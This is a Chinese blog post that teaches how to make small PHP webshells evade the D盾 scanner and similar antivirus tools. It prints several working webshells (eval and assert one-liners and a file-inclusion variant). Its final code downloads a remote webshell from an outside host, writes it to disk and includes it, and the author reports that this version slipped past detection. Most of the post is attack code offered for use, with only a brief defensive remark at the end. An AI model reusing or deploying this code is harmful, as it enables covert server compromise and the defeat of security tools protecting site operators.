浅谈PHP小马免杀

在渗透测试过程初期,上传小马,拿到 webshell 再进行下一步的操作,现如今的网站安全更多是一些云防护、CDN防护、服务器安全软件等等,给渗透测试、提权等带来了一定难度的提升,今天探讨一下如何做PHP小马的免杀。

小马:体积、代码量比较小的webshell文件,一般借助“中国菜刀”、蚁剑等 shell 链接工具,进行进一步的渗透测试

小马因为代码小,显得更加灵活。就像行军打仗的侦察兵、卧底,里应外合,最后攻下城池

今天的PHP代码免杀,主要是针对D盾

下载了一个最新版的D盾:http://www.d99net.net/

0x01 常见的小马

<?php @eval($_POST['x']); ?>

上述代码可能是大家见过最普通的小马文件了,体积小

但是基本上过不了任何装有了 WAF 或者安全软件的检测

刚在本地编写一个,结果就被 win10 自带的 defender 给杀了,可见其有多弱~

常见小马

到D盾检查一下:

D盾5级

爆了5级危险

由此可见,这种精简的小马,已经不再适合当下互联网环境


0x02 初步尝试

既然eval()函数无法使用,我们尝试其他的可执行命令的函数呐?

更换assert()函数

assert函数5级

同样被检测为高危了,由此,这种更换其他函数的方式,实则换汤不换药,如此免杀小马,肯定是不可行的。

还有别的方法吗?


0x02 从开发者角度思考问题

为什么 PHP 或者其他编程语言当中,会出现这些“危险高权限”函数,因为开发者需要,如果都被安全软件拦截了,那么开发人员又该如何去实现自己的功能呐?

其实,我们免杀的过程就是要从开发者会犯的错误入手,这些看上去符合正常业务逻辑的程序,也可能隐藏着可突破杀软拦截的方法。

2.1 文件包含

从文件包含入手

<?php
    $file = isset($_GET['file'])?trim($_GET['file']):'<?php @assert($_POST["x"]);?>';
    require_once($file);
?>

再来看看,D盾的拦截提示:

3级提示

3级危险提示,可疑的引用

因为是引用文件,所以提示了可疑


2.2 假装自己是个程序员

程序员

仔细一琢磨,哪家的程序员会这样写代码,连函数都没有!!!

幻想自己现在是一名正在加班熬夜写 BUG 的程序猿

那么,我们再写个函数

<?php
    error_reporting(0);
    /**
    * DYBOY写的BUG,通过获取远程小马的代码
    **/
    function httpGET($target_url, $get_data = array()){
        $result = file_get_contents($target_url);
        file_put_contents('../xiaoma.txt', $result);    //windows本地环境特殊,使用相对路径,linux可以使用“/”即网站根目录
        return TRUE;
    }

    $r_file = httpGET('http://www.top15.cn/content/uploadfile/201908/7b9c1566231060.txt');
    require_once('../xiaoma.txt');
?>

OK,成功过了检测!

成功绕过

那么实际效果怎么样呐?

棒极了!

OK,非常棒!


2.3 继续优化

和安全似乎有点无关了,小东觉得上面的代码,每次都要去远程获取文件,这种行为是不够优雅的

因此增加一个判断文件是否已存在,增强变量名可读性

<?php
    error_reporting(0);
    /**
    * DYBOY写的BUG,通过获取远程小马的代码
    **/
    $file_path_name = '../xiaoma.txt';

    function httpGET($target_url, $get_data = array()){
        $content = file_get_contents($target_url);
        file_put_contents($file_path_name, $content);    //windows本地环境特殊,使用相对路径,linux可以使用“/”即网站根目录
        return TRUE;
    }

    if(!file_exists($file_path_name)){
        httpGET('http://www.top15.cn/content/uploadfile/201908/7b9c1566231060.txt');
    }

    require_once($file_path_name);
?>

关于为什么不直接读取远程文件的问题,读取远程文件需要 php.ini 中设置 allow_url_include=On ;一般来讲,PHP 默认此属性关闭,也很少会有网站会开启此功能,因此将远程文件先下载到本地,再利用 LFI(本地文件包含)方式执行任意代码!


0x03 总结

其实脚本的免杀非常灵活,任何的防护软件都得保证程序的基本功能,因此在权衡是正常程序还是异常程序这个点上,单纯的脚本防护能力还是比较弱的

在对攻击进行拦截的方法中,基于攻击大数据训练出来的攻击识别模型,或许才是下一代防火墙要做的事情,不少的 CDN 云防护产品正是基于此

在云防护的保障下,同样要坚信,安全无绝对,面对多维度的攻击,云防护也并不是无懈可击。

发表评论 / Comment

用心评论~